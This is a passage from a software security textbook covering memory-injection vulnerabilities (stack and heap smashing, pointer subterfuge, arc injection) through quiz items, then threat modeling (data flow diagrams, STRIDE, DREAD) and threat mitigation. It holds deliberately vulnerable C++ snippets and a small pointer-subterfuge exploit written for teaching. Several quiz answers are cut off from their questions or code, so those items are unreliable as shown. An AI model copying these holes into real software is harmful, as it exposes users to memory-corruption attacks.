long array[3] = {1, 1, (long)"Dangerous"};
// exploit it
subterfugeVulnerability(array, 3);
}
Notice how three items are in the array, and the third item is carefully created.
When the vulnerable function is called, the “Safe” message will be replaced
with “Dangerous”:
Message is: "Dangerous".
A No. There is a stack variable called text but it is just a pointer, not a buffer. The
buffer is located on the heap so it might be an example of Heap Smashing.
7. Q Is there a stack smashing vulnerability in the following C++ code?
void function(char * text)
{
cin >> text;
}
A No. The buffer “some text” is static text and exists in the code section of
memory. This means we will probably have a compile error; the data type of
“some text” is a const char * rather than a char *. At any rate, since there is
no stack buffer, Stack Smashing cannot exist.
A Yes. Notice how initially text1 points to a heap buffer. This we know because of
the new statement. Notice how text2 is a stack buffer. When the statement
text1 = text2; gets executed, then text1 points to the same stack buffer that
text2 contains. This means that the cin >> text1; statement will overrun the
stack buffer. For stack smashing to occur, three conditions must be met:
• There must be a buffer (such as an array) on the stack. This condition is met
when text1 points to the text2 buffer.
• The first buffer must be reachable through external input. This condition is
met through the cin statement.
• The mechanism to fill the buffer from the external input must not correctly
check for the buffer size. This condition is met because cin does not check
for the buffer size when c-strings are on the right-hand-side of the extraction
operator.
Since all of the conditions are met, we have an example of stack smashing.
10. Q I would like to create a custom memory management tool for my application.
The standard memory manager can handle memory requests of any size. Mine
will be different. It will only allocate memory in 256 byte blocks. This means that
I do not have to use a linked list to keep track of free and reserved blocks: I can
just use a Boolean array. Is this memory management tool vulnerable to Heap
Smashing?
A No. heap smashing can only occur if an MCB can be overwritten. For this to
happen, the MCB must be near a buffer that is overrun. Since there is no MCB
in this memory management scheme, no Heap Smashing can occur. This brings
up the interesting question: what happens when a buffer is overrun? The
answer is that the adjacent buffer is overrun, but no memory management
pointers are altered. Another vulnerability might result, but it will not be Heap
Smashing.
11. Q A canary can be used to detect stack smashing attacks. Can a similar technique
be used to detect heap smashing attacks?
A Yes. A canary can be placed at the beginning of an MCB and, when memory is
freed, it can be checked. Since the acceptable way to deal with a smashed
canary is to end the program, this will effectively turn Heap Smashing attempts
into heap spraying attacks.
A No. The first requirement for heap smashing is: “There must be two adjacent
heap buffers”. Here we have only one buffer. Because the source text is longer
than the buffer size of the destination, we do have an example of a buffer
overrun. In this case, the buffer overrun results in the MCB being overwritten.
This produces heap spraying.
13. Q Is there a heap smashing vulnerability in the following C++ code?
{
char * text1 = new char[10];
char * text2 = new char[10];
strcpy(text2, userInput);
delete [] text2;
delete [] text1;
}
A No. The requirements for the heap smashing vulnerability are the following:
• There must be two adjacent heap buffers. This condition is met because
text1 and text2 were allocated right after each other. In most cases, they
will be next to each other in memory.
• The first buffer must be reachable through external input. This condition is
not met. It is the second buffer which is reached.
• The mechanism to fill the buffer from the external input must not correctly
check for the buffer size. We will assume that userInput meets this
constraint.
• The second buffer must be released before the first. Notice how text2 is
released first. This condition is met.
Since one condition is not met, we have an example of heap spraying rather
than heap smashing.
14. Q Is there a heap smashing vulnerability in the following C++ code?
void callee(char * parameter)
{
char * text = new char[10];
cin >> parameter;
delete [] text;
}
void caller()
{
char * text = new char[10];
callee(text);
delete [] text;
}
A Yes. The requirements for the heap smashing vulnerability are the following:
• There must be two adjacent heap buffers. Even though these two buffers
are allocated in separate functions, they will probably reside next to each
other because one was allocated immediately after the other.
• The first buffer must be reachable through external input. This condition is
met because the first buffer (called text in caller()) is reachable through
external input as parameter in callee().
• The mechanism to fill the buffer from the external input must not correctly
check for the buffer size. The cin mechanism for c-strings does not check
buffer size.
• The second buffer must be released before the first. The buffer allocated in
callee() is released first.
Since all the conditions are met, we have an example of Heap Smashing.
A If the user inputs the following text “%s%s%s”, then the printf() function will
expect four parameters when only one is given. This will output data from the
stack to the screen, or crash the program.
Exercises
1 For each of the following memory injection vulnerabilities, define it, describe
the vulnerability that is exploited, and list the conditions that must be present
for the vulnerability to be exploited:
• Stack Smashing
• Heap Smashing
• Array Index
• Integer Overflow
• Arc Injection
• Pointer Subterfuge
• Vtable Smashing
• ANSI-Unicode mismatch
• VAR-Args
6 Name the vulnerability associated with the following C++ code:
class Action
{
public:
char text[256];
virtual void safe();
virtual void unsafe();
};
getText(text, sizeof(text));
}
string source;
cout << "What is your name? ";
cin >> source;
MultiByteToWideChar(
CP_ACP, // code page: default
0, // flags: 0 means normal mode
source, // source c-string
-1, // count of bytes in source
target, // target buffer Unicode
sizeof(target)); // size of target buffer
}
11 Name the vulnerability associated with the following C++ code:
void readData(int data[], int size)
{
char fileName[256];
cout << "Filename? ";
cin >> fileName;
void dangerous()
{
cout << "Password: 'Rosebud'\n";
}
void doNothing()
{
char text[256];
void (*p)() = safe;
16 Describe in your own words how memory is allocated from the Heap, and how
memory is freed.
Problems
1 Please find and read the article “The Rising Threat of Vulnerabilities Due to
Integer Errors” by Ahmad (2003). In the article, the author made several
recommendations about how to mitigate integer errors. Summarize each of his
nine suggestions in your own words.
4 You are developing a C++ compiler for a single platform (iPhone). One of your
design goals is to make it impossible (or nearly impossible) to introduce a stack
vulnerability using this compiler. Note that stack implementation is completely
up to the compiler. How would you build this compiler?
5 Write a C++ program to display the address of an element on the stack, in the
heap, and in the code section of memory:
Stack: 0x7fff7c2d4738
Heap: 0x19ce010
Code: 0x400d9c
6 Write a C++ program to read and manipulate stack variables that are out of
scope. To do this, create a collection of local variables in one function. From that
first function, call a second passing no parameters. In the second function, read
and display the values of the local variables in the first function. This is done by
finding where on the stack the local variables of the first function reside.
Chapter 08: Threat Modeling
It is impossible to thoroughly analyze and inspect every line of code in a large codebase. There is simply
too much code! This chapter will present a methodology for identifying those parts of the codebase most
likely to contain vulnerabilities.
Threat modeling is the process of systematically analyzing a given system for the
purpose of obtaining a ranked list of vulnerabilities to be addressed (Howard &
LeBlanc, 2003). The goal is to introduce enough tools and techniques to focus
vulnerability-seeking activities without incurring undue overhead in the software
development process. In other words, it falls somewhere between simple code
reviews and formal evaluation techniques.
Threat modeling is best done during the specification and early design phase of a
project. This enables the design team to build security into the design rather than
attempting to retrofit security to an inherently insecure design. Threat modeling
is also a valuable activity during the closing stages of the design cycle. This enables
the test team, working in conjunction with the development team, to focus their
efforts on the security-critical components of the design. Finally, threat modeling
is a valuable activity during security pushes (where all members of the team are
working to meet security goals), which could happen at any point in the
development cycle. The threat model process consists of six stages:
1. Assemble resources
2. Decompose the system
3. Identify threats
4. Rank the threats
5. Make a response plan
6. Mitigate the threats
2. Decompose the System
The second step of the threat model process is to create a map of the system.
This map needs to completely describe all the data that enters and leaves the
system, all the security checkpoints in the system, and how data gets transformed
from one state to another. Because system complexity can exceed what humans
can internalize, an external tool is necessary to facilitate the process. The most
common tool used for this purpose is a Data Flow Diagram.
A Data Flow Diagram (DFD) is a representation of a system highlighting the
storage, processing, and transmission (the three states of information resources
from the McCumber model) of information resources through the system. A DFD
is not a representation of how data is stored in the system (use a UML class
diagram for that), how functions call each other (use a structure chart for that),
or how the algorithms work (use a flow chart or pseudocode for that). Instead,
the DFD tracks the origin of data, how it passes through the system, how data is
transformed or verified through various processing steps, and where it is stored.
All security vulnerabilities occur at these key junctures.
[Figure: the User interactor sends plaintext commands and a password to a UI process; the UI sets and gets hashed data through the Password class and returns a yes/no bool.]
Figure 08.1: Data flow diagram representing a simple program with one class
The above example illustrates several properties of the DFD:
Algorithm: The algorithm is not represented in a DFD. In other words, the DFD does not
describe how the program works, just how data flows through the system. A flow
chart or pseudocode is used to describe algorithms.
Modules: Not all functions are listed in a DFD, because not all functions
communicate with data from the outside world. A structure chart is used to
describe the modules and how they relate to each other in a program.
Data: Details of the data representation are not described. The DFD describes the state
of data as it flows through the system (the labels near the arrows), but does not
describe the exact format of the data representation. A UML class diagram is a
useful tool for describing data representation.
Storage: The location where data is stored is represented in a DFD.
Specifically, any user data or any system assets are represented in a DFD. It is not
necessary to represent other data types such as counters. In the above example,
"Hashed data" represents stored data.
Transmission: Show how data moves from one location to another. In each case, describe the
format of the data.
Processing: Show where data is transformed and where key security checks are made. How
the data is transformed or how the checks are performed is not represented in a
DFD.
There are five components to a DFD: interactors, flow, processors, storage, and
trust boundaries.
Interactors
Interactors are agents existing outside the system. They provide input to the
system and consume output from the system. Examples of common interactors
include users, the network, other programs, sensors, and other I/O devices.
Interactors are represented as rectangles in DFDs:
User: Users are common interactors, serving both to consume output and to generate
input. Output is typically on the screen or through speakers; input is typically
textual from the keyboard or coordinates from the mouse.
Network: Network interactors can consume output, generate input, or both. Typically this
is done through packets containing either textual data or binary data. In any case,
they appear in a DFD as an interactor.
Program: When two programs interact through APIs, message passing, or file interfaces,
they serve as interactors to each other. Their interfaces can be simple or
complex. It is important to represent the interface with the flow.
Flow
Flow represents movement of data from one location to another, originating
from and terminating at an interactor, a processing node, or a data store. Flow
cannot go directly from one data store to another; there must be some processing
involved. Similarly, flow only consists of data transitions; it does not represent
program control.
password: Here a textual password is being sent from one location to another. In the code,
this will be represented as a string object or a c-string.
bool: Here binary data, a bool, is sent between locations. The flow can be
labeled with either the data type or the variable name.
ACL: Often more complex data is sent between processes, such as a complete data
structure or a class. Again, label the flow with either the data type or the variable
representing an instance of the data type.
filename: Frequently files are sent to programs from interactors. It is important that the
format of the file is known and represented in these cases.
Processors
A DFD processor is a location in a program where data is transformed or where
checks are performed. Note that a processor is only included in a DFD when data
is being viewed that originated from outside the program. This includes data
stored within the program that originally came from a user. As a result, a DFD
almost never captures all the functionality of a program.
The only way a program can be exploited is if an external input causes the
program to behave differently than the way it was designed to behave. In other
words, if there is no external input, there is no opportunity for exploitation.
Therefore, processes that are neither initiated by external input nor handle external
data cannot be vulnerable to exploitation. They may have defects that cause
undesirable behavior, but that behavior is not caused by the malicious activity of
others. For example, a memory management process that periodically optimizes
memory usage cannot contain vulnerabilities if it runs on its own accord (as
opposed to being started due to an event triggered from external input) and if it
only operates on its own data. On the other hand, if it is run due to external input
or if the memory it optimizes came from an external source, then the potential
for vulnerabilities exists. For this reason, it is critical to identify all the processes
in the program that handle external data.
convert: Functions converting data from one format to another are common processing
nodes. Note that a processor could be a group of functions or even part of a single
function.
verify: Functions only allowing data to pass through if certain conditions are met are
also common processing nodes.
read: Often data flows are initiated by a process. For example, a function called read()
may read an XML file from an external interactor.
Storage
Storage represents data at rest. It is important to realize that although we may
think data may be accessible only through a small number of known interfaces, it
can often be accessed through unexpected means. For example, the data in a
vault (called money!) may be only accessible through the vault door where all
security decisions are made. However, a thief may use an unexpected attack
vector by coming in through the floor!
password: Data is often stored as variables in memory. Here the variable name is
represented within the horizontal lines.
file.txt: Data could be stored in a file. Enumerate all the ways the file can be accessed,
not just through the program but also through the file system!
Trust Boundaries
Trust boundaries represent areas of differing levels of security or trust. In other
words, the area inside a bank is more controlled than those outside its walls.
Walls and video cameras introduce a more secure environment than the sidewalk
outside. Similarly, the area inside a program is more controlled than the file
system. Any time a protective measure is introduced, a trust boundary is implied.
computer: The data inside a computer is controlled by the operating system, making the
computer the outermost trust boundary in many circumstances.
program: The data inside a program is more trusted than data outside because the
program itself manages how the data is accessed and stored. Thus, the program
forms a trust boundary.
class: Classes exhibiting the principle of encapsulation form a natural trust boundary
because access to the data is controlled by the setters and getters.
control: Often a trust boundary is included if part of the program is controlled by
an authentication or access control mechanism. For example, a part of the user
interface verifying passwords would introduce a trust boundary.
Final Thoughts
There are a few basic rules that a DFD needs to follow.
• Processes must have at least one data flow entering and one data flow exiting.
• All data flow must start and stop at a process.
• Data stores connect to processes with data flow.
• Data stores cannot connect together.
• Process names are verbs and nouns.
• Data flow names, external entities, and data store items are nouns.
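The structural rules above lend themselves to a mechanical check. The sketch below uses hypothetical `NodeKind` and `Flow` types (not from this chapter) and validates two of the rules over a list of flows: data stores may not connect directly, and every process needs at least one flow entering and one exiting.

```cpp
#include <map>
#include <string>
#include <utility>
#include <vector>

// Hypothetical DFD node classification and flow record.
enum NodeKind { INTERACTOR, PROCESS, STORE };

struct Flow { std::string from, to; };

bool followsRules(const std::map<std::string, NodeKind> &nodes,
                  const std::vector<Flow> &flows)
{
   std::map<std::string, std::pair<int, int>> inOut; // per-process in/out counts
   for (const Flow &f : flows)
   {
      NodeKind from = nodes.at(f.from);
      NodeKind to   = nodes.at(f.to);
      if (from == STORE && to == STORE)  // data stores cannot connect together
         return false;
      if (from == PROCESS) inOut[f.from].second++;
      if (to   == PROCESS) inOut[f.to].first++;
   }
   for (const auto &n : nodes)  // each process needs a flow in and a flow out
      if (n.second == PROCESS &&
          (inOut[n.first].first == 0 || inOut[n.first].second == 0))
         return false;
   return true;
}
```

For example, a diagram in which a flow runs from one store directly to another, or in which a process consumes data but never emits any, would be rejected.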
3. Identify Threats
One can identify the threats to a system by examining each part of the DFD for
potential threats. It is important to note that these are not vulnerabilities; only
after further analysis can we determine if the threat could actually be made
manifest with the current design. Because these threats can take on so many
different forms, it is helpful at this point in time to think about the McCumber
Cube’s three dimensions: the protection mechanisms, the information states, and
the type of asset.
First, the protection mechanism can be technology, policy & practice, or
training. Since most of the threats a software engineer will be concerned with are
to be addressed with technology protection mechanisms, this dimension of the
McCumber Cube can be safely ignored. Note that this is not always the case;
social engineering attacks (Chapter 04: Social Engineering) often need to be
addressed with all three protection mechanisms.
Second, information assets can occur in one of three states: transmission (flow),
storage, and processing. Each of these states is represented in the DFD. A
thorough threat modeling process involves careful analysis of each part of the
DFD. When working with assets in transmission, it is useful to look at each layer
of the O.S.I. model in turn.
Finally, consider the type of asset and how it can be attacked. This approach is
simplified when working from a comprehensive list of possible threats. There are
many classifications of threats, including D.A.D. (disclosure, alteration, and
denial), S.T.R.I.D.E. (spoofing, tampering, repudiation, information disclosure,
denial of service, and elevation of privilege), and others. Of these, S.T.R.I.D.E. is the most
commonly used (Howard & Longstaff, 1998).
When considering a given security checkpoint, be that an authentication
algorithm, an encryption algorithm, or a function to transform data into some
format, it is useful to brainstorm about hypothetical attacks. Is there a disclosure
opportunity at this point? Is there an alteration opportunity? What about denial?
One problem with this approach is that the D.A.D. categories are so broad and
the types of attacks they describe are so varied that it is difficult to convince
yourself that all (or even many) of the possible attacks have been identified. This
observation has led to the S.T.R.I.D.E. taxonomy, a more detailed version of
D.A.D.
S.T.R.I.D.E.
The S.T.R.I.D.E. taxonomy was developed in 2002 by Microsoft Corp. to enable
software engineers to more accurately and systematically identify defects in code
they are evaluating. There are six components of S.T.R.I.D.E.
Spoofing
Spoofing identity is pretending to be someone other than who you really are. This
includes programs that mimic login screens in order to capture names and
passwords, or attacks that get you access to someone else's passwords and then use
them to access data as if the attacker were that person. Spoofing attacks
frequently lead to other types of attack. Examples include:
• Masking a real IP address so another can gain access to something that otherwise
would have been restricted.
• Writing a program to mimic a login screen for the purpose of capturing
authentication information.
Tampering
Tampering with data is possibly the easiest component of S.T.R.I.D.E. to
understand: it involves changing data in some way. This could involve simply
deleting critical data, or it could involve modifying legitimate data to fit some
other purpose. Examples include:
• Someone intercepting a transmission over a network and modifying the content
before sending it on to the recipient.
• A virus modifying the program logic of a host program so malicious code is
executed every time the host program is loaded.
• Modifying the contents of a webpage without authorization.
Repudiation
Repudiation is the process of denying or disavowing an action; in other words,
hiding your tracks. The final stages of an attack sometimes include modifying logs
to hide the fact that the attacker accessed the system at all. Another example is
a murderer wiping his fingerprints off of the murder weapon: he is trying to
deny that he did anything. Repudiation typically occurs after another type of
threat has been exploited. Note that repudiation is a special type of tampering
attack. Examples include:
• Changing log files so actions cannot be traced.
• Signing a credit card with a name other than what is on the card and telling the
credit card company that the purchase was not made by the card owner.
Information Disclosure
Information disclosure occurs when a user's confidential data is exposed to
individuals against the wishes of the owner of the information. Often these
attacks receive a great deal of media attention. Organizations like TJ Maxx and
the US Department of Veterans Affairs have been involved in the inappropriate
disclosure of information such as credit card numbers and personal health
records. These disclosures have been the result of both malicious attacks and
simple human negligence. Examples include:
• Getting information from co-workers that is not supposed to be shared.
• Someone watching a network and viewing information in plaintext.
Threat Trees
In most cases, a single attack can yield other attacks. For example, an attacker
able to elevate his privilege to an administrator can normally go on to delete the
logs associated with the attack. In this scenario, an elevation of privilege attack
leads to a repudiation attack, and a threat tree is a graphical way to represent this
relation.
Figure 08.2: Simple threat tree
There are many reasons why threat trees are important and useful tools. First, we can easily
see the root attack that is the source of the problem. Second, we can see all the
attacks that are likely to follow if the root attack is successful. This is important
because often the root attack is not the most severe attack in the tree. Finally,
the threat tree gives us a good idea of the path the attacker will follow to get to
the high-value assets.
In many situations, the threat tree can involve several stages and be quite
involved. Consider, for example, an attacker who notices that unintended
information is made available on an e-commerce site. From this disclosure, the
attacker is able to impersonate a normal customer. With this minimal amount of
privilege, the attacker pokes around and finds a way to change the user's role to
administrator. Once in this state, the attacker can wipe the logs, create a new
account for himself so he can re-enter the system at will, sell confidential
information to the highest bidder, and shut down the site at will.
Figure 08.3: Non-trivial threat tree
One final thought about threat trees: it is tempting to simply address the root
problem, believing that the entire attack will be mitigated if the first step is
blocked. This approach is problematic. If the attacker is able to find another way
to get to the head of the threat tree through a previously unknown attack vector,
then the entire threat tree can be realized. It is far safer to attempt to address
every step of the tree. This principle is called "defense in depth."
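The follow-on relationship a threat tree captures can be sketched in code. The types below are hypothetical (the chapter defines no such structures): each node is a threat, its children are the attacks that become possible once it succeeds, and counting the reachable nodes shows how much of the tree is exposed if any path reaches the root.

```cpp
#include <string>
#include <vector>

// Hypothetical threat-tree node: a threat plus the attacks it enables.
// Requires C++17 (std::vector of an incomplete type).
struct Threat
{
   std::string name;              // e.g. "E: elevate privilege to admin"
   std::vector<Threat> children;  // follow-on attacks once this succeeds
};

// Count the root plus every follow-on attack beneath it. Blocking only
// the root still leaves this many attacks one unknown vector away.
int countReachable(const Threat &root)
{
   int n = 1;
   for (const Threat &child : root.children)
      n += countReachable(child);
   return n;
}
```

For the simple tree in the text, an elevation of privilege node with a repudiation child yields a reachable count of two.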
4. Rank Threats
There are an infinite number of threats in a given system, some corresponding to
real vulnerabilities and some not. It is important to focus resources on the
important threats rather than wasting time on those of little value. This is why
the process of ranking threats is so important. Perhaps the simplest way to
determine the importance of a threat is through a two-axis analysis:
              Likely   Unlikely
   Severe        1         2
   Harmless      3         4
Figure 08.4: A four quadrant representation of threat importance.
From this scale, the importance of a given vulnerability can be computed.
Quadrant 4 Quadrant 4 consists of vulnerabilities that are harmless and unlikely. An example
is a stray cosmic ray (an extremely unlikely event) striking a memory location in
RAM causing an unused bit (a harmless event) to change.
Quadrant 3 Quadrant 3 is composed of likely events that are harmless. An example is an
unauthorized user attempting to log into a system (a very likely event) but being
denied access (essentially harmless).
Quadrant 2 Quadrant 2 consists of severe events that are unlikely. An example is both main
power and auxiliary power failing simultaneously for an eCommerce web server
(an unlikely event that would prove severe for an eCommerce company).
Quadrant 1 Quadrant 1 holds the most important vulnerabilities and events for a system. This
includes events that are severe and likely. An example is a worm exploiting a
previously unknown vulnerability which results in a compromised system. This is
both likely (new previously-unknown vulnerabilities are discovered frequently)
and severe.
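The quadrant assignment above is mechanical enough to express directly. A minimal sketch (a hypothetical function, with the judgments of "severe" and "likely" reduced to booleans):

```cpp
// Map a threat's severity and likelihood onto the four quadrants of
// Figure 08.4: 1 = severe and likely (most important), 2 = severe but
// unlikely, 3 = likely but harmless, 4 = harmless and unlikely.
int quadrant(bool severe, bool likely)
{
   if (severe)
      return likely ? 1 : 2;
   else
      return likely ? 3 : 4;
}
```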
Threat ranking involves examining the code surrounding individual threats,
determining if a vulnerability exists, and assessing the seriousness of the
problem. While the importance of a threat can be computed by its severity and
likelihood, it is more useful to use a more detailed system: D.R.E.A.D. (damage
potential, reproducibility, exploitability, affected users, and discoverability)
(Howard & LeBlanc, 2003).
Damage Potential
As the name suggests, this category describes how bad things could be if the
attack succeeds. In other words, what is the worst case scenario?
This category of threats is rated on the worst case scenario, with 10 being "asset
completely destroyed" and 0 being "no damage":
10 Asset completely destroyed or compromised.
8 Little access to asset but possibly recoverable.
6 Significant disruption or asset not playing a key role.
4 Inconvenience to the user.
2 Slight annoyance or unimportant asset.
0 No damage whatsoever.
Reproducibility
Reproducibility is the probability that an attacker can successfully carry out a
known exploit. This is not the chance that the attacker can learn of the exploit
(discoverability), nor the amount of effort required to conduct the attack
(exploitability), but rather the chance that the attack will succeed. For example,
the reproducibility of an attack requiring split-second timing is relatively low.
This category of threats is rated on the ability of an attacker to predictably exploit
a vulnerability. If, for example, a given wireless network is only vulnerable during a
solar storm which occurs every decade, the reproducibility risk will be quite low.
The score is based on a percentage estimate of success multiplied by 10, and
rounded to the nearest whole number.
risk = probability x 10
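Assuming the probability is expressed as a fraction between 0 and 1, the formula above can be sketched as:

```cpp
#include <cmath>

// Reproducibility rating per the formula above: the estimated probability
// of a successful attack (0.0 to 1.0) multiplied by 10 and rounded.
// The affected-users category later in the chapter uses the same shape,
// with a percentage of users in place of a probability.
int reproducibilityRisk(double probability)
{
   return static_cast<int>(std::lround(probability * 10.0));
}
```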
Exploitability
The exploitability component of D.R.E.A.D. refers to how much effort is required
to successfully complete an attack. Breaking through a steel door, for example,
would require much more effort than breaking through a glass door. In both
cases, the broken door will yield a high damage potential and both attacks have
high reproducibility. However, it takes more tools, money, time, and skill to break
through a steel door than a glass door.
10 Absolutely no effort is required.
8 Access to some readily-available tools.
6 Skilled cracker or inside information.
4 A concerted effort by a large corporation can succeed.
2 Requires a breakthrough in technology and/or a large number of computers.
0 Takes a large number of supercomputers years to achieve, costing billions of
dollars.
Affected Users
The affected users component of D.R.E.A.D. is purely a business category. It can
only be computed if it is known what percentage of the likely user base will have
their system configured in such a way as to expose the vulnerability. If 10 people
out of 5 million are vulnerable to a given attack, the affected users value is low.
However, if 10 out of 20 are vulnerable, it becomes a much higher priority. One
can mitigate the effect of affected users by making the vulnerable feature “off by
default.” Again, the score is based on the percentage of users multiplied by 10
and rounded.
risk = percentage x 10
Discoverability
The discoverability component of D.R.E.A.D. refers to the likelihood that an
attacker will be able to discover that a given vulnerability exists on a system. This
category realistically has no zero score because the hacking community is so well
connected. A zero score means that a given vulnerability is completely un-
discoverable. Since anything can be found, this is seldom applicable. A one refers
to vulnerabilities that are exceedingly difficult to discover without inside
knowledge. A ten means that anyone can find it; it is obvious.
10 “The key is in the lock” or the threat is obvious to everyone.
8 Most attackers will come up with the attack in a short amount of time.
6 Though it is not obvious, it can be found with some thought or reasoning.
4 Extremely subtle or requires a large amount of creative thinking.
2 A breakthrough in thinking is required, or access to highly confidential insider
knowledge.
0 “There is no way” to discover this vulnerability.
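The chapter does not give a formula for combining the five D.R.E.A.D. ratings; a common convention (an assumption here, not stated in the text) is to average them into an overall score from 0 to 10:

```cpp
// Combine the five D.R.E.A.D. category ratings (each 0-10) into one
// overall score. Averaging is an assumed convention; the chapter only
// defines the individual category scales.
double dreadScore(int damage, int reproducibility, int exploitability,
                  int affectedUsers, int discoverability)
{
   return (damage + reproducibility + exploitability +
           affectedUsers + discoverability) / 5.0;
}
```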
6. Mitigate
The purpose of making an ordered list (see step 4) is to triage the vulnerabilities.
The term "triage" originated from a technique developed by French doctors in
WWI to treat those with the most severe injuries first. We follow a similar
technique when working with security issues.
Examples
1. Q Create a threat for an attack on a classroom
Comments: All the assets uniquely accessible in the room are physical.
There is no data access potential that is unique to the room.
Also, though there are significant assets in the room, they
are the same as those available elsewhere on campus.
2. Q Create a threat for the following scenario: An attacker is sitting in the parking lot
of Lowe’s with a laptop and a large antenna. For several hours, he eavesdrops on
the wireless traffic from the store’s wi-fi network. Finally, he collects enough
data to crack the WEP key! He steps into an existing connection between the
local Lowe’s store and the franchise headquarters for the purpose of
downloading credit card data.
3. Q Create a Data Flow Diagram from the following C++ program
   /****************************************************************
    * GET SECRET WORD
    * Return the secret word
    ***************************************************************/
   string getSecretWord(int key)
   {
      // appears random and unimportant if the binary is searched
      string cipherText = "S#4T!";
      // ... (decryption of cipherText into word elided) ...
      return word;
   }

   /****************************************************************
    * IS AUTHENTIC
    * This function will return TRUE if the file contains the secret
    * keyword and is thus authentic, and will return FALSE otherwise
    ****************************************************************/
   bool isAuthentic(const char * fileName)
   {
      // open the file
      ifstream fin(fileName);
      if (fin.fail())
         return false;
      // ... (remainder of the function elided) ...

   /******************************************************************
    * MAIN: The elaborate UI
    ******************************************************************/
   int main(int argc, char ** argv)
   {
      // display the message
      cout << "The file " << argv[1]
           << (isAuthentic(argv[1]) ? " is" : " is not")
           << " authentic\n";
      return 0;
   }
A  [DFD: the User interactor; main, isAuthentic, and getSecretWord processes; fileName, text, bool, and plaintext flows; the cipherText store "S#4T!"; a program trust boundary.]
Figure 08.6: DFD solution to a simple multi-function program.
4. Q Create a Data Flow Diagram for a class implementing the ADT Stack. The UML
class diagram is the following:
Stack
- data
- capacity
- num
+ Stack
+ operator =
+ empty
+ size
+ pop
+ top
+ const_top
+ push
- grow
A  [DFD: the client interacts with the Stack methods (Stack, ~Stack, empty, size, pop, top, const_top, push), which read and write data, num, and capacity; grow is an internal process; the Stack class forms the trust boundary.]
5. Q Compute the D.R.E.A.D. score for the following:
• A mugger is threatening to steal my wallet.
• I am a fast runner so I suspect I can out-run him if I try.
• After having received my black belt, I have spent several years on the cage-fighting circuit.
• This mugger appears to be after every person who walks down this street.
• Because this is a bad neighborhood, it is likely that it has occurred to all the
youth here to try their hand at mugging.
7. Q Compute the D.R.E.A.D. score for the following: It has been discovered that all
previous versions of Adobe Flash have a bug in their implementation of the RSA
algorithm; as a result, all "secure" interchanges with a web server are significantly less
secure than previously thought. It is estimated that a third of all Internet users
use Flash to communicate with their bank or other e-commerce sites. A
knowledgeable hacker can implement an attack in about a week, but it does not
take a knowledgeable attacker to carry out the attack if a tool is created for him
or her.
Exercises
1 From memory, list and describe the steps in the threat model process.
2 Based on the “Pick the lock to gain access to the room” threat example, create
two more threats:
x Damage lock so the door cannot be opened.
x Enter through the ceiling to gain access to the room.
3 From memory, draw the Data Flow Diagram elements for each of the following:
• Interactors
• Flow
• Processors
• Storage
• Trust boundaries
4 From memory, list all the rules for a Data Flow Diagram.
6 From memory, describe in as much detail as possible how you would compute a
D.R.E.A.D. score for each of the following categories:
• D.
• R.
• E.
• A.
• D.
Problems
1 Perform a threat model on some software of your choice.
Start with an asset list being the things the software is designed to protect. Next
create a data flow diagram of the software. Finally, come up with a sorted threat
list, each threat looking like the examples above.
Chapter 09: Mitigation
The purpose of this chapter is to help you become aware of all possible ways to deal with security
vulnerabilities so the best possible decision can be made. You should be able to enumerate the six
responses, explain the pros and cons of each in the context of a given scenario, and suggest an appropriate
strategy that reduces threats to the user's assets.
Threat mitigation is the process of reducing or removing a threat from a system.
When contemplating a change to the codebase, it is essential that the change has
the maximal positive benefit to all the stakeholders. Thus a security fix that
reduces functionality might not be the right choice. In order to make a more
informed decision as to how best to deal with a vulnerability, it is important first
to understand the options.
For example, consider the author of a program that facilitates banking
transactions for tellers working in a small regional bank. A recent audit discovered
that many of the tellers were using trivial passwords such as “1234.” Clearly this
results in security challenges. To mitigate this problem, the programmer decides
to write some code which forces passwords to conform to the following requirements: be 15 characters long, not appear in the dictionary, contain at least 3 digits, and have at least 5 unique symbols. This certainly addresses the problem,
but introduces several new ones (the tellers write their new password on a note
and fasten it to their screen). What else could be done? A few ideas:
• Send a notification of weak passwords to the manager who could then use the opportunity to educate the teller in a kinder way.
• Create a policy where weak passwords could result in disciplinary action.
• Redirect failed login attempts to a fake server which monitors the actions of potential intruders.
As you can see, there are many more possible recourses to the programmer than
was first apparent. In order to choose the best possible action, the programmer
needs to know what is available.
This chapter will present the six fundamental ways in which a defender can
respond to an attack: prevention, preemption, deterrence, deflection, detection,
and countermeasures (Halme & Bauer, 1996). Each of these six will be described,
related to the scenario of protecting your car, and presented in the context of
network security protective measures.
Prevention
Prevention is the process of increasing the difficulty of an attack by removing or
reducing vulnerabilities, introducing trust boundaries to complicate attack
vectors, or strengthening defenses. The goal of all prevention activities is not
necessarily to preclude a successful attack, but rather to increase the difficulty of
the attack to the point where it is no longer worth the effort. While attackers
retain the Attacker’s Advantage, defenders have the home-field advantage. In
other words, defenders are free to change the rules of the game to favor their
side. This is the essence of prevention techniques. Threat modeling coupled with
code hardening are two of the most commonly used prevention techniques.
Disadvantage: Safety is only a function of the strength of the protection and the level of determination of the attacker. If the attacker really wants to get in, he is likely to eventually find a way.
The vast majority of threat mitigation strategies should focus on prevention. This
can happen through training, policy, or technology tools.
Training: Consider a denial attack on a credit card call center. The attacker calls the credit card company and tricks the operator into deleting an important part of a customer file. This attack can be mitigated by training the operators about the attack so they can recognize it if it is attempted again. Training is the process of making human operators more knowledgeable so they can respond to previously unseen attacks.
Policy: Policy mitigation strategies occur when a procedure is developed and given to
employees which is designed to prevent such an attack. Back to our call center
example, the managers could identify a set of steps the operators are to follow
when a caller wishes to delete a part of a customer file. The manager would then
distribute this procedure to all the operators and make sure they understand
how it works. Policy mechanisms are algorithms carried out by people. Their
effectiveness is a function of how complete the policy is, how well understood
the policy is, and how closely the policy is followed. If the attacker is able to find
a weakness in any of these three components, then an opportunity for attack
may exist.
Technology: By far, the most common prevention mitigation strategy a software engineer
would follow uses technology. In almost every case, it involves fixing a bug or
introducing a new security check. Back to our call center example, this could be
to introduce a prompt for a password from the manager before parts of a
customer file are deleted. Technology mechanisms can be implemented in
software or hardware. Even the lock to a door is considered a technology
prevention mechanism.
Security vulnerability bug fixes are typically treated differently than normal bug
fixes. A developer would normally fix a bug by simply changing the code and
recompiling. Security bug fixes, on the other hand, are normally accompanied by
a code review. Another developer, possibly a security expert or a manager, would
look at the proposed fix and approve it before it is incorporated into the code
base. The proposed fix is usually described in terms of a “diff.” A code diff is the
difference between the original code and the proposed change. On Linux
systems, the diff command is used to produce a diff. An example of the results of a diff follows:
139c139
< while (string::npos != iEnd);
---
> while (string::npos != iEnd && !sFullName.empty());
Here we can see that the difference between the two files occurs at line 139. The code to be removed is the part of a while loop having a single component to the Boolean expression. The new code introduces a second clause.
